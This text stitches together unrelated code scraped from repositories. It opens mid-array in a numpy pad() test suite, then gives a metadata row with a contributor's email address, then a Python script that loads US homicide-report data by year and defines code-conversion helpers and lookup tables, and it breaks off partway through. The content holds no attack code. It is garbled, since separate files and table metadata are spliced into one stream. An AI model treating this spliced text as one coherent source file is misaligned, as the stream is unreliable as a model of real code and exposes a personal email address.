             [0.,  0.,   0.,  1.,  2.,  3.,  4.,   2.,  0.],
             [0., 2.5,   5.,  6.,  7.,  8.,  9.,  4.5,  0.],
             [0.,  5.,  10., 11., 12., 13., 14.,   7.,  0.],
             [0., 7.5,  15., 16., 17., 18., 19.,  9.5,  0.],
             [0., 3.75, 7.5,  8., 8.5,  9., 9.5, 4.75,  0.],
             [0.,  0.,   0.,  0.,  0.,  0.,  0.,   0.,  0.]])
        assert_allclose(result, expected)
class TestReflect(TestCase):
    """Tests for mode='reflect': mirror about the edge value, which is
    not itself repeated."""

    def test_check_simple(self):
        """1-D reflection of 0..99 with pad widths (25, 20)."""
        padded = pad(np.arange(100), (25, 20), 'reflect')
        # left mirrors 25..1, right mirrors 98..79
        expected = np.r_[25:0:-1, 0:100, 98:78:-1]
        assert_array_equal(padded, expected)

    def test_check_odd_method(self):
        """reflect_type='odd' continues the ramp instead of mirroring it."""
        padded = pad(np.arange(100), (25, 20), 'reflect', reflect_type='odd')
        expected = np.r_[-25:0, 0:100, 100:120]
        assert_array_equal(padded, expected)

    def test_check_large_pad(self):
        """Pad widths larger than the 2x3 input wrap the reflection."""
        padded = pad([[4, 5, 6], [6, 7, 8]], (5, 7), 'reflect')
        # rows alternate the reflected second and first input rows
        top = np.array([7, 6, 7, 8] * 4)[:15]
        bottom = top - 2
        expected = np.array([top, bottom] * 7)
        assert_array_equal(padded, expected)

    def test_check_shape(self):
        """A single-row input reflects to identical rows everywhere."""
        padded = pad([[4, 5, 6]], (5, 7), 'reflect')
        row = np.array([5, 4, 5, 6] * 4)[:15]
        expected = np.tile(row, (13, 1))
        assert_array_equal(padded, expected)

    def test_check_01(self):
        assert_array_equal(pad([1, 2, 3], 2, 'reflect'),
                           np.array([3, 2, 1, 2, 3, 2, 1]))

    def test_check_02(self):
        assert_array_equal(pad([1, 2, 3], 3, 'reflect'),
                           np.array([2, 3, 2, 1, 2, 3, 2, 1, 2]))

    def test_check_03(self):
        # pad width exceeds the input length: reflection repeats
        assert_array_equal(pad([1, 2, 3], 4, 'reflect'),
                           np.array([1, 2, 3, 2, 1, 2, 3, 2, 1, 2, 3]))
class TestSymmetric(TestCase):
    """Tests for mode='symmetric': mirror about the edge, repeating the
    edge value itself."""

    def test_check_simple(self):
        """1-D symmetric padding of 0..99 with widths (25, 20)."""
        padded = pad(np.arange(100), (25, 20), 'symmetric')
        # left mirrors 24..0 (edge repeated), right mirrors 99..80
        expected = np.r_[24:-1:-1, 0:100, 99:79:-1]
        assert_array_equal(padded, expected)

    def test_check_odd_method(self):
        """reflect_type='odd' continues the ramp through the repeated edge."""
        padded = pad(np.arange(100), (25, 20), 'symmetric', reflect_type='odd')
        expected = np.r_[-24:1, 0:100, 99:119]
        assert_array_equal(padded, expected)

    def test_check_large_pad(self):
        """Pad widths larger than the 2x3 input repeat the mirrored tiles."""
        padded = pad([[4, 5, 6], [6, 7, 8]], (5, 7), 'symmetric')
        row_a = np.array([5, 6, 6, 5, 4, 4] * 3)[:15]
        row_b = row_a + 2
        # rows come in mirrored pairs: AABB repeated, ending with AA
        rows = ([row_a] * 2 + [row_b] * 2) * 3 + [row_a] * 2
        assert_array_equal(padded, np.array(rows))

    def test_check_large_pad_odd(self):
        """Odd symmetric padding: each mirrored row pair steps up by 2."""
        padded = pad([[4, 5, 6], [6, 7, 8]], (5, 7), 'symmetric',
                     reflect_type='odd')
        base = np.array([-3, -2, -2, -1, 0, 0, 1, 2, 2, 3, 4, 4, 5, 6, 6])
        rows = [base + 2 * step for step in range(7) for _ in (0, 1)]
        assert_array_equal(padded, np.array(rows))

    def test_check_shape(self):
        """A single-row input gives identical rows everywhere."""
        padded = pad([[4, 5, 6]], (5, 7), 'symmetric')
        row = np.array([5, 6, 6, 5, 4, 4] * 3)[:15]
        assert_array_equal(padded, np.tile(row, (13, 1)))

    def test_check_01(self):
        assert_array_equal(pad([1, 2, 3], 2, 'symmetric'),
                           np.array([2, 1, 1, 2, 3, 3, 2]))

    def test_check_02(self):
        assert_array_equal(pad([1, 2, 3], 3, 'symmetric'),
                           np.array([3, 2, 1, 1, 2, 3, 3, 2, 1]))

    def test_check_03(self):
        # pad width double the input length: the mirrored tile repeats
        assert_array_equal(
            pad([1, 2, 3], 6, 'symmetric'),
            np.array([1, 2, 3, 3, 2, 1, 1, 2, 3, 3, 2, 1, 1, 2, 3]))
class TestWrap(TestCase):
    """Tests for mode='wrap': periodic (circular) padding."""

    def test_check_simple(self):
        """1-D wrap of 0..99 with widths (25, 20)."""
        padded = pad(np.arange(100), (25, 20), 'wrap')
        # left is the last 25 values, right is the first 20
        expected = np.r_[75:100, 0:100, 0:20]
        assert_array_equal(padded, expected)

    def test_check_large_pad(self):
        """Pad widths larger than the 3x4 input tile it periodically."""
        padded = pad(np.arange(12).reshape(3, 4), (10, 12), 'wrap')
        # each output row is the matching input row tiled across 26 columns;
        # rows cycle with period 3, starting from input row 2
        row_c = np.array([10, 11, 8, 9] * 7)[:26]
        row_a = row_c - 8
        row_b = row_c - 4
        rows = [row_c, row_a, row_b] * 8 + [row_c]
        assert_array_equal(padded, np.array(rows))

    def test_check_01(self):
        assert_array_equal(pad([1, 2, 3], 3, 'wrap'),
                           np.array([1, 2, 3, 1, 2, 3, 1, 2, 3]))

    def test_check_02(self):
        assert_array_equal(pad([1, 2, 3], 4, 'wrap'),
                           np.array([3, 1, 2, 3, 1, 2, 3, 1, 2, 3, 1]))
class TestStatLen(TestCase):
    """Tests for the stat_length option of the statistic pad modes."""

    def test_check_simple(self):
        """mode='mean' with stat_length=(3,) averages only the three
        values nearest each edge."""
        matrix = np.arange(30).reshape(6, 5)
        padded = pad(matrix, ((2, 3), (3, 2)), mode='mean', stat_length=(3,))
        expected = np.array(
            [[6, 6, 6, 5, 6, 7, 8, 9, 8, 8],
             [6, 6, 6, 5, 6, 7, 8, 9, 8, 8],
             [1, 1, 1, 0, 1, 2, 3, 4, 3, 3],
             [6, 6, 6, 5, 6, 7, 8, 9, 8, 8],
             [11, 11, 11, 10, 11, 12, 13, 14, 13, 13],
             [16, 16, 16, 15, 16, 17, 18, 19, 18, 18],
             [21, 21, 21, 20, 21, 22, 23, 24, 23, 23],
             [26, 26, 26, 25, 26, 27, 28, 29, 28, 28],
             [21, 21, 21, 20, 21, 22, 23, 24, 23, 23],
             [21, 21, 21, 20, 21, 22, 23, 24, 23, 23],
             [21, 21, 21, 20, 21, 22, 23, 24, 23, 23]]
        )
        assert_array_equal(padded, expected)
class TestEdge(TestCase):
    """Tests for mode='edge': repeat the nearest edge value."""

    def test_check_simple(self):
        """2-D edge padding of a 4x3 array with widths ((2,3),(3,2))."""
        padded = pad(np.arange(12).reshape(4, 3), ((2, 3), (3, 2)), 'edge')
        # each input row [3i, 3i+1, 3i+2] becomes
        # [3i, 3i, 3i, 3i, 3i+1, 3i+2, 3i+2, 3i+2]; the first row is
        # repeated 3x (2 pad + itself), the last 4x (itself + 3 pad)
        base = np.array([0, 3, 6, 9]).reshape(4, 1) \
             + np.array([0, 0, 0, 0, 1, 2, 2, 2])
        expected = np.repeat(base, [3, 1, 1, 4], axis=0)
        assert_array_equal(padded, expected)

    def test_check_width_shape_1_2(self):
        """A pad_width of the form ((1, 2),) broadcasts to every axis.

        Regression test for issue gh-7808.
        """
        vec = np.array([1, 2, 3])
        assert_array_equal(pad(vec, ((1, 2),), 'edge'),
                           np.array([1, 1, 2, 3, 3, 3]))

        mat = np.array([[1, 2, 3], [4, 5, 6]])
        assert_array_equal(pad(mat, ((1, 2),), 'edge'),
                           pad(mat, ((1, 2), (1, 2)), 'edge'))

        cube = np.arange(24).reshape(2, 3, 4)
        assert_array_equal(pad(cube, ((1, 2),), 'edge'),
                           pad(cube, ((1, 2), (1, 2), (1, 2)), 'edge'))
class TestZeroPadWidth(TestCase):
    """Zero-width padding must return the input unchanged."""

    def test_zero_pad_width(self):
        # scalar, per-side tuple, and per-axis forms of a zero width
        matrix = np.arange(30).reshape(6, 5)
        for width in (0, (0, 0), ((0, 0), (0, 0))):
            assert_array_equal(matrix, pad(matrix, width, mode='constant'))
class TestLegacyVectorFunction(TestCase):
    """A user-supplied padding function may be passed as the mode."""

    def test_legacy_vector_functionality(self):
        def fill_tens(vector, pad_width, iaxis, kwargs):
            # overwrite the padded margins in place; returning the vector
            # is the legacy protocol
            vector[:pad_width[0]] = 10
            vector[-pad_width[1]:] = 10
            return vector

        padded = pad(np.arange(6).reshape(2, 3), 2, fill_tens)
        # a 6x7 field of tens with the original 2x3 block in the centre
        expected = np.full((6, 7), 10)
        expected[2:4, 2:5] = np.arange(6).reshape(2, 3)
        assert_array_equal(padded, expected)
class TestNdarrayPadWidth(TestCase):
    """pad_width may be given as an ndarray rather than nested tuples."""

    def test_check_simple(self):
        padded = pad(np.arange(12).reshape(4, 3),
                     np.array(((2, 3), (3, 2))), 'edge')
        # same expected result as TestEdge.test_check_simple: each input
        # row edge-extended to 8 columns, first row x3, last row x4
        base = np.array([0, 3, 6, 9]).reshape(4, 1) \
             + np.array([0, 0, 0, 0, 1, 2, 2, 2])
        expected = np.repeat(base, [3, 1, 1, 4], axis=0)
        assert_array_equal(padded, expected)
class TestUnicodeInput(TestCase):
    """The mode name may be supplied as a unicode string."""

    def test_unicode_mode(self):
        padded = np.pad([1], 2, mode=u'constant')
        assert_array_equal(padded, np.array([0, 0, 1, 0, 0]))
class ValueError1(TestCase):
    """Invalid pad specifications must raise ValueError."""

    def test_check_simple(self):
        # three per-axis pad specs supplied for a 2-D array
        arr = np.arange(30)
        arr = np.reshape(arr, (6, 5))
        kwargs = dict(mode='mean', stat_length=(3, ))
        assert_raises(ValueError, pad, arr, ((2, 3), (3, 2), (4, 5)),
                      **kwargs)

    def test_check_negative_stat_length(self):
        # stat_length must be non-negative
        arr = np.arange(30)
        arr = np.reshape(arr, (6, 5))
        kwargs = dict(mode='mean', stat_length=(-3, ))
        assert_raises(ValueError, pad, arr, ((2, 3), (3, 2)),
                      **kwargs)

    def test_check_negative_pad_width(self):
        # pad widths must be non-negative
        arr = np.arange(30)
        arr = np.reshape(arr, (6, 5))
        kwargs = dict(mode='mean', stat_length=(3, ))
        assert_raises(ValueError, pad, arr, ((-2, 3), (3, 2)),
                      **kwargs)
class ValueError2(TestCase):
    """Negative pad amounts must raise ValueError."""

    def test_check_negative_pad_amount(self):
        # NOTE(review): identical inputs to
        # ValueError1.test_check_negative_pad_width -- likely a duplicate
        arr = np.arange(30)
        arr = np.reshape(arr, (6, 5))
        kwargs = dict(mode='mean', stat_length=(3, ))
        assert_raises(ValueError, pad, arr, ((-2, 3), (3, 2)),
                      **kwargs)
class ValueError3(TestCase):
    """Malformed keyword and pad-amount combinations must raise."""

    def test_check_kwarg_not_allowed(self):
        # reflect_type is not a valid keyword for mode='mean'
        arr = np.arange(30).reshape(5, 6)
        assert_raises(ValueError, pad, arr, 4, mode='mean',
                      reflect_type='odd')

    def test_mode_not_set(self):
        # NOTE(review): relies on pad() having no default mode; newer numpy
        # releases default mode to 'constant', which would break this test
        arr = np.arange(30).reshape(5, 6)
        assert_raises(TypeError, pad, arr, 4)

    def test_malformed_pad_amount(self):
        arr = np.arange(30).reshape(5, 6)
        assert_raises(ValueError, pad, arr, (4, 5, 6, 7), mode='constant')

    def test_malformed_pad_amount2(self):
        arr = np.arange(30).reshape(5, 6)
        assert_raises(ValueError, pad, arr, ((3, 4, 5), (0, 1, 2)),
                      mode='constant')

    def test_pad_too_many_axes(self):
        arr = np.arange(30).reshape(5, 6)
        # Attempt to pad using a 3D array equivalent
        bad_shape = (((3,), (4,), (5,)), ((0,), (1,), (2,)))
        assert_raises(ValueError, pad, arr, bad_shape,
                      mode='constant')
class TypeError1(TestCase):
    """Non-integer pad widths must raise TypeError."""

    def test_float(self):
        arr = np.arange(30)
        assert_raises(TypeError, pad, arr, ((-2.1, 3), (3, 2)))
        assert_raises(TypeError, pad, arr, np.array(((-2.1, 3), (3, 2))))

    def test_str(self):
        arr = np.arange(30)
        assert_raises(TypeError, pad, arr, 'foo')
        assert_raises(TypeError, pad, arr, np.array('foo'))

    def test_object(self):
        class FooBar(object):
            pass
        arr = np.arange(30)
        assert_raises(TypeError, pad, arr, FooBar())

    def test_complex(self):
        arr = np.arange(30)
        assert_raises(TypeError, pad, arr, complex(1, -1))
        assert_raises(TypeError, pad, arr, np.array(complex(1, -1)))

    def test_check_wrong_pad_amount(self):
        # a malformed (3-element) per-axis spec with non-int content
        arr = np.arange(30)
        arr = np.reshape(arr, (6, 5))
        kwargs = dict(mode='mean', stat_length=(3, ))
        assert_raises(TypeError, pad, arr, ((2, 3, 4), (3, 2)),
                      **kwargs)
# Run all test classes in this module when executed as a script.
if __name__ == "__main__":
    np.testing.run_module_suite()
| [
"lukaspolon@gmail.com"
] | lukaspolon@gmail.com |
1e4fcb46ad26e77180ef6a7b17db5eca61bcb120 | 10fba4bbbf792d4d51130d9612cdf90386ab4942 | /gun_violence_project/src/process.py | 9329a597743ef45c34a7bebe94b5500a147bc4d0 | [] | no_license | pf4d/pattern_recognition | f9318c6952d715eb9adbe4c5171bc392f65706ce | c0bbb923c5f26597735186cb35ff78fd77cb7603 | refs/heads/master | 2021-06-16T01:12:43.623815 | 2020-12-15T04:01:39 | 2020-12-15T04:01:39 | 73,958,950 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 62,946 | py | from pylab import *
# Per-year SHR record arrays (1976-2012), one pre-parsed .npy file per year.
# NOTE(review): the 37 parallel names could be a single {year: array} dict,
# but downstream code presumably references these module-level names
# directly -- confirm before consolidating.
d1976 = load('data/1976.npy')
d1977 = load('data/1977.npy')
d1978 = load('data/1978.npy')
d1979 = load('data/1979.npy')
d1980 = load('data/1980.npy')
d1981 = load('data/1981.npy')
d1982 = load('data/1982.npy')
d1983 = load('data/1983.npy')
d1984 = load('data/1984.npy')
d1985 = load('data/1985.npy')
d1986 = load('data/1986.npy')
d1987 = load('data/1987.npy')
d1988 = load('data/1988.npy')
d1989 = load('data/1989.npy')
d1990 = load('data/1990.npy')
d1991 = load('data/1991.npy')
d1992 = load('data/1992.npy')
d1993 = load('data/1993.npy')
d1994 = load('data/1994.npy')
d1995 = load('data/1995.npy')
d1996 = load('data/1996.npy')
d1997 = load('data/1997.npy')
d1998 = load('data/1998.npy')
d1999 = load('data/1999.npy')
d2000 = load('data/2000.npy')
d2001 = load('data/2001.npy')
d2002 = load('data/2002.npy')
d2003 = load('data/2003.npy')
d2004 = load('data/2004.npy')
d2005 = load('data/2005.npy')
d2006 = load('data/2006.npy')
d2007 = load('data/2007.npy')
d2008 = load('data/2008.npy')
d2009 = load('data/2009.npy')
d2010 = load('data/2010.npy')
d2011 = load('data/2011.npy')
d2012 = load('data/2012.npy')
def groupConvert(g, sg):
    """Translate an SHR population (group, subgroup) code pair to an index.

    The major group code ``g`` is checked first; only if it matches none of
    the known spellings is the more detailed subgroup code ``sg`` consulted.
    Codes may arrive as plain digit strings, digit strings with a trailing
    space, letter-suffixed strings such as '8A', or ints.

    Returns an int in 1..23, or None (after printing a diagnostic) when
    neither code is recognised.
    """
    # (accepted spellings, result) pairs.  Tuple membership uses ==, so an
    # int code matches its int spelling exactly as the original chain did.
    group_map = (
        (('0', '0 ', 0), 1),
        (('1', '1 ', 1), 2),
        (('2', '2 ', 2), 6),
        (('3', '3 ', 3), 7),
        (('4', '4 ', 4), 8),
        (('5', '5 ', 5), 9),
        (('6', '6 ', 6), 10),
        (('7', '7 ', 7), 11),
        (('8', '8 ', 8), 12),
        (('9', '9 ', 9), 18),
    )
    subgroup_map = (
        (('0', '0 ', 0), 1),
        (('1', '1 ', 1), 2),
        (('11', '1A', 11), 3),
        (('12', '1B', 12), 4),
        (('13', '1C', 13), 5),
        (('20', 20, '2', '2 ', 2), 6),
        (('30', 30, '3', '3 ', 3), 7),
        (('40', 40, '4', '4 ', 4), 8),
        (('50', 50, '5', '5 ', 5), 9),
        (('60', 60, '6', '6 ', 6), 10),
        (('70', 70, '7', '7 ', 7), 11),
        (('80', 80, '8', '8 ', 8), 12),
        (('81', '8A', 81), 13),
        (('82', '8B', 82), 14),
        (('83', '8C', 83), 15),
        (('84', '8D', 84), 16),
        (('85', '8E', 85), 17),
        (('90', 90, '9', '9 ', 9), 18),
        (('91', '9A', 91), 19),
        (('92', '9B', 92), 20),
        (('93', '9C', 93), 21),
        (('94', '9D', 94), 22),
        (('95', '9E', 95), 23),
    )
    for codes, value in group_map:
        if g in codes:
            return value
    for codes, value in subgroup_map:
        if sg in codes:
            return value
    # unrecognised pair: report it and fall through to an implicit None,
    # matching the legacy behavior (print() form works on Python 2 and 3)
    print('group: %s %s subgroup: %s %s' % (type(g), g, type(sg), sg))
def typeConvert(t):
    """Convert a homicide-type code to 1 or 2.

    '1'/'A'/1 -> 1 (murder/non-negligent manslaughter record type),
    '2'/'B'/2 -> 2.  Unrecognised codes are printed and yield None.
    """
    if t in ('1', 'A', 1):
        return 1
    if t in ('2', 'B', 2):
        return 2
    # Python-2/3-compatible replacement for the legacy print statement
    print('type: %s %s' % (type(t), t))
def sitConvert(s):
    """Convert a situation code (digits '1'-'6' or letters 'A'-'F') to 1..6.

    Unrecognised codes are printed and yield None.
    """
    situations = (
        (('1', 'A', 1), 1),
        (('2', 'B', 2), 2),
        (('3', 'C', 3), 3),
        (('4', 'D', 4), 4),
        (('5', 'E', 5), 5),
        (('6', 'F', 6), 6),
    )
    for codes, value in situations:
        if s in codes:
            return value
    print('situation: %s %s' % (type(s), s))
def convSex(s):
    """Map a sex code to 1 (male), 2 (female), or 3 (unknown/missing).

    Accepts '1'/'M'/1, '2'/'F'/2; codes 8/9 (str or int), 'U' and None all
    mean unknown.  Anything else is printed and yields None.
    """
    if s in ('1', 'M', 1):
        return 1
    if s in ('2', 'F', 2):
        return 2
    if s in ('9', '8', 'U', 9, 8) or s is None:
        return 3
    print('sex: %s %s' % (type(s), s))
def convRace(r):
    """Map a race code string to a one-letter label.

    '1' -> 'W', '2' -> 'B', '3' -> 'I', '4' -> 'A', '9' -> 'U'.
    NOTE(review): unlike the sibling converters this one accepts only
    string codes and returns letters rather than ints -- kept as-is so
    existing callers are unaffected.  Unrecognised codes (including int
    codes) are printed and yield None.
    """
    races = {'1': 'W', '2': 'B', '3': 'I', '4': 'A', '9': 'U'}
    label = races.get(r)
    if label is not None:
        return label
    print('race: %s %s' % (type(r), r))
def convWeap(w):
    """Convert an SHR weapon code (str or int) to a compact index 1-17.

    Codes 11..85 map in order to 1..16; codes 90/98/99 and missing values
    all collapse to 17 (unknown/other).  Unrecognised codes are printed
    and yield None.
    """
    # the recognised codes, in the order of their compact indices 1..16
    weapon_codes = ('11', '12', '13', '14', '15', '20', '30', '40', '50',
                    '55', '60', '65', '70', '75', '80', '85')
    for index, code in enumerate(weapon_codes):
        if w == code or w == int(code):
            return index + 1
    if w in ('90', '98', '99', 90, 98, 99) or w is None:
        return 17
    print('weapon: %s %s' % (type(w), w))
def convRelation(r):
    """Convert a victim/offender relationship code to an index 1-29.

    Each relationship is accepted either as its numeric code (str or int)
    or its two-letter SHR mnemonic ('HU' husband, 'WI' wife, ...).
    99/'UN', 98, 88 and missing values all mean unknown (29).
    Unrecognised codes are printed and yield None.
    """
    # mnemonics in the order of their numeric codes 1..28
    mnemonics = ('HU', 'WI', 'CH', 'CW', 'MO', 'FA', 'SO', 'DA', 'BR', 'SI',
                 'IL', 'SF', 'SM', 'SS', 'SD', 'OF', 'NE', 'AQ', 'BF', 'GF',
                 'XH', 'XW', 'EE', 'ER', 'FR', 'HO', 'OK', 'ST')
    for index, code in enumerate(mnemonics):
        value = index + 1
        if r == code or r == str(value) or r == value:
            return value
    if r in ('99', 'UN', 99, '98', 98, '88', 88) or r is None:
        return 29
    print('relation: %s %s' % (type(r), r))
def convCircum(c):
    """Convert a circumstance code (str or int) to its canonical int value.

    Recognised codes map to themselves as ints; 88/98/99/998 (str or int)
    and missing values collapse to 99 (undetermined).  Unrecognised codes
    are printed and yield None.
    """
    known = (2, 3, 5, 6, 7, 9, 10, 17, 18, 19, 26, 32, 40, 41, 42, 43, 44,
             45, 46, 47, 48, 49, 50, 51, 52, 53, 59, 60, 70, 80, 81)
    for code in known:
        if c == code or c == str(code):
            return code
    if c in ('99', 99, 88, '88', '98', 98, '998', 998) or c is None:
        return 99
    print('circumstance: %s %s' % (type(c), c))
def convSubCircum(c):
    """Convert a sub-circumstance code to an index 1-7 (7 = other/unknown).

    Digits '1'-'6' or letters 'A'-'F' map to 1..6; '0'/'G', the digits
    7-9 (str or int) and missing values all map to 7.  Unrecognised codes
    are printed and yield None.
    """
    subcodes = (
        (('1', 'A', 1), 1),
        (('2', 'B', 2), 2),
        (('3', 'C', 3), 3),
        (('4', 'D', 4), 4),
        (('5', 'E', 5), 5),
        (('6', 'F', 6), 6),
    )
    for codes, value in subcodes:
        if c in codes:
            return value
    if c in ('0', 'G', '9', '8', '7', 0, 7, 8, 9) or c is None:
        return 7
    print('subcircumstance: %s %s' % (type(c), c))
def convAge(a):
    """Return an age field as an int.

    Newborn codes 'BB'/'NB' map to 0; missing values (None or '998') map
    to 999; everything else is parsed with int().
    NOTE(review): '100' and '101' also map to 0 in the original -- confirm
    that these codes really mean "birth" rather than ages 100/101.
    """
    if a in ('BB', 'NB', '100', '101'):
        return 0
    if a is None or a == '998':
        return 999
    return int(a)
def convMSACode(c):
    """Return the MSA code as an int, using 9999 when the field is missing."""
    return 9999 if c is None else int(c)
def convCount(c):
    """Parse a count field; a missing value counts as 0."""
    return 0 if c is None else int(c)
# Column labels, by output index, for the normalized rows that the
# gather_type_* functions in this file build (year/month/agency header
# fields, then 11 victim age/sex pairs, then 11 six-field offender
# records).
header = {0 : 'year',
          1 : 'month',
          2 : 'state',
          3 : 'group',
          4 : 'population',
          5 : 'MSA indication',
          6 : 'MSA code',
          7 : 'type of homicide',
          8 : 'situation',
          9 : 'victim count',
          10 : 'offender count',
          11 : 'victim 1 age',
          12 : 'victim 1 sex',
          13 : 'victim 2 age',
          14 : 'victim 2 sex',
          15 : 'victim 3 age',
          16 : 'victim 3 sex',
          17 : 'victim 4 age',
          18 : 'victim 4 sex',
          19 : 'victim 5 age',
          20 : 'victim 5 sex',
          21 : 'victim 6 age',
          22 : 'victim 6 sex',
          23 : 'victim 7 age',
          24 : 'victim 7 sex',
          25 : 'victim 8 age',
          26 : 'victim 8 sex',
          27 : 'victim 9 age',
          28 : 'victim 9 sex',
          29 : 'victim 10 age',
          30 : 'victim 10 sex',
          31 : 'victim 11 age',
          32 : 'victim 11 sex',
          33 : 'offender 1 age',
          34 : 'offender 1 sex',
          35 : 'offender 1 weapon',
          36 : 'offender 1 relationship to victim 1',
          37 : 'offender 1 circumstance',
          38 : 'offender 1 sub-circumstance',
          39 : 'offender 2 age',
          40 : 'offender 2 sex',
          41 : 'offender 2 weapon',
          42 : 'offender 2 relationship to victim 1',
          43 : 'offender 2 circumstance',
          44 : 'offender 2 sub-circumstance',
          45 : 'offender 3 age',
          46 : 'offender 3 sex',
          47 : 'offender 3 weapon',
          48 : 'offender 3 relationship to victim 1',
          49 : 'offender 3 circumstance',
          50 : 'offender 3 sub-circumstance',
          51 : 'offender 4 age',
          52 : 'offender 4 sex',
          53 : 'offender 4 weapon',
          54 : 'offender 4 relationship to victim 1',
          55 : 'offender 4 circumstance',
          56 : 'offender 4 sub-circumstance',
          57 : 'offender 5 age',
          58 : 'offender 5 sex',
          59 : 'offender 5 weapon',
          60 : 'offender 5 relationship to victim 1',
          61 : 'offender 5 circumstance',
          62 : 'offender 5 sub-circumstance',
          63 : 'offender 6 age',
          64 : 'offender 6 sex',
          65 : 'offender 6 weapon',
          66 : 'offender 6 relationship to victim 1',
          67 : 'offender 6 circumstance',
          68 : 'offender 6 sub-circumstance',
          69 : 'offender 7 age',
          70 : 'offender 7 sex',
          71 : 'offender 7 weapon',
          72 : 'offender 7 relationship to victim 1',
          73 : 'offender 7 circumstance',
          74 : 'offender 7 sub-circumstance',
          75 : 'offender 8 age',
          76 : 'offender 8 sex',
          77 : 'offender 8 weapon',
          78 : 'offender 8 relationship to victim 1',
          79 : 'offender 8 circumstance',
          80 : 'offender 8 sub-circumstance',
          81 : 'offender 9 age',
          82 : 'offender 9 sex',
          83 : 'offender 9 weapon',
          84 : 'offender 9 relationship to victim 1',
          85 : 'offender 9 circumstance',
          86 : 'offender 9 sub-circumstance',
          87 : 'offender 10 age',
          88 : 'offender 10 sex',
          89 : 'offender 10 weapon',
          90 : 'offender 10 relationship to victim 1',
          91 : 'offender 10 circumstance',
          92 : 'offender 10 sub-circumstance',
          93 : 'offender 11 age',
          94 : 'offender 11 sex',
          95 : 'offender 11 weapon',
          96 : 'offender 11 relationship to victim 1',
          97 : 'offender 11 circumstance',
          98 : 'offender 11 sub-circumstance'}
# Population-group codes -> descriptions (city/county size classes,
# MSA vs non-MSA, state police).
group = {1 : "POSSESSIONS",
         2 : "ALL CITIES 250,000 OR OVER",
         3 : "ALL CITIES 1,000,000 OR OVER",
         4 : "CITIES BETWEEN 500,000 AND 999,999",
         5 : "CITIES BETWEEN 250,000 AND 499,999",
         6 : "CITIES BETWEEN 100,000 AND 249,999",
         7 : "CITIES BETWEEN 50,000 AND 99,999",
         8 : "CITIES BETWEEN 25,000 AND 49,999",
         9 : "CITIES BETWEEN 10,000 AND 24,999",
         10 : "CITIES BETWEEN 2,500 AND 9,999",
         11 : "CITIES UNDER 2,500",
         12 : "NON-MSA COUNTIES",
         13 : "NON-MSA COUNTIES 100,000 OR OVER",
         14 : "NON-MSA COUNTIES BETWEEN 25,000 AND 99,999",
         15 : "NON-MSA COUNTIES BETWEEN 10,000 AND 24,999",
         16 : "NON-MSA COUNTIES UNDER 10,000",
         17 : "NON-MSA STATE POLICE",
         18 : "MSA COUNTIES",
         19 : "MSA COUNTIES 100,000 OR OVER",
         20 : "MSA COUNTIES BETWEEN 25,000 AND 99,999",
         21 : "MSA COUNTIES BETWEEN 10,000 AND 24,999",
         22 : "MSA COUNTIES UNDER 10,000",
         23 : "MSA STATE POLICE"}
# Numeric state/territory codes -> names.
state = {1 : "ALABAMA",
         2 : "ARIZONA",
         3 : "ARKANSAS",
         4 : "CALIFORNIA",
         5 : "COLORADO",
         6 : "CONNETICUT",
         7 : "DELAWARE",
         8 : "WASHINGTON, D.C.",
         9 : "FLORIDA",
         10 : "GEORGIA",
         11 : "IDAHO",
         12 : "ILLINOIS",
         13 : "INDIANA",
         14 : "IOWA",
         15 : "KANSAS",
         16 : "KENTUCKY",
         17 : "LOUISIANA",
         18 : "MAINE",
         19 : "MARYLAND",
         20 : "MASSACHUSETTS",
         21 : "MICHIGAN",
         22 : "MINNESOTA",
         23 : "MISSISSIPPI",
         24 : "MISSOURI",
         25 : "MONTANA",
         26 : "NEBRASKA",
         27 : "NEVADA",
         28 : "NEW HAMPSHIRE",
         29 : "NEW JERSEY",
         30 : "NEW MEXICO",
         31 : "NEW YORK",
         32 : "NORTH CAROLINA",
         33 : "NORTH DAKOTA",
         34 : "OHIO",
         35 : "OKLAHOMA",
         36 : "OREGON",
         37 : "PENNSYLVANIA",
         38 : "RHODE ISLAND",
         39 : "SOUTH CAROLINA",
         40 : "SOUTH DAKOTA",
         41 : "TENNESSEE",
         42 : "TEXAS",
         43 : "UTAH",
         44 : "VERMONT",
         45 : "VIRGINIA",
         46 : "WASHINGTON",
         47 : "WEST VIRGINIA",
         48 : "WISCONSIN",
         49 : "WYOMING",
         50 : "ALASKA",
         51 : "HAWAII",
         52 : "CANAL ZONE",
         53 : "PUERTO RICO",
         54 : "AMERICAN SAMOA",
         55 : "GUAM",
         62 : "VIRGIN ISLANDS"}
# NOTE(review): this assignment to `group` is byte-identical to an
# earlier definition in this file and is therefore redundant; it can be
# removed without changing behaviour.
group = {1 : "POSSESSIONS",
         2 : "ALL CITIES 250,000 OR OVER",
         3 : "ALL CITIES 1,000,000 OR OVER",
         4 : "CITIES BETWEEN 500,000 AND 999,999",
         5 : "CITIES BETWEEN 250,000 AND 499,999",
         6 : "CITIES BETWEEN 100,000 AND 249,999",
         7 : "CITIES BETWEEN 50,000 AND 99,999",
         8 : "CITIES BETWEEN 25,000 AND 49,999",
         9 : "CITIES BETWEEN 10,000 AND 24,999",
         10 : "CITIES BETWEEN 2,500 AND 9,999",
         11 : "CITIES UNDER 2,500",
         12 : "NON-MSA COUNTIES",
         13 : "NON-MSA COUNTIES 100,000 OR OVER",
         14 : "NON-MSA COUNTIES BETWEEN 25,000 AND 99,999",
         15 : "NON-MSA COUNTIES BETWEEN 10,000 AND 24,999",
         16 : "NON-MSA COUNTIES UNDER 10,000",
         17 : "NON-MSA STATE POLICE",
         18 : "MSA COUNTIES",
         19 : "MSA COUNTIES 100,000 OR OVER",
         20 : "MSA COUNTIES BETWEEN 25,000 AND 99,999",
         21 : "MSA COUNTIES BETWEEN 10,000 AND 24,999",
         22 : "MSA COUNTIES UNDER 10,000",
         23 : "MSA STATE POLICE"}
# Suburban-indicator codes.
suburban = {0 : "NON-SUBURBAN",
            1 : "SUBURBAN"}
# Month codes (99 = unknown).
months = {1 : "JANUARY",
          2 : "FEBRUARY",
          3 : "MARCH",
          4 : "APRIL",
          5 : "MAY",
          6 : "JUNE",
          7 : "JULY",
          8 : "AUGUST",
          9 : "SEPTEMBER",
          10 : "OCTOBER",
          11 : "NOVEMBER",
          12 : "DECEMBER",
          99 : "UNKNOWN"}
# Sub-year age codes for victims under twelve months old.
ageUnder12mo = {1 : "BIRTH TO ONE WEEK OLD (INCLUDES \"ABANDONED INFANT\")",
                2 : "ONE WEEK TO TWELVE MONTHS OLD",
                9 : "INAP., NOT CODED 0 IN REF 23"}
# Homicide-type codes.
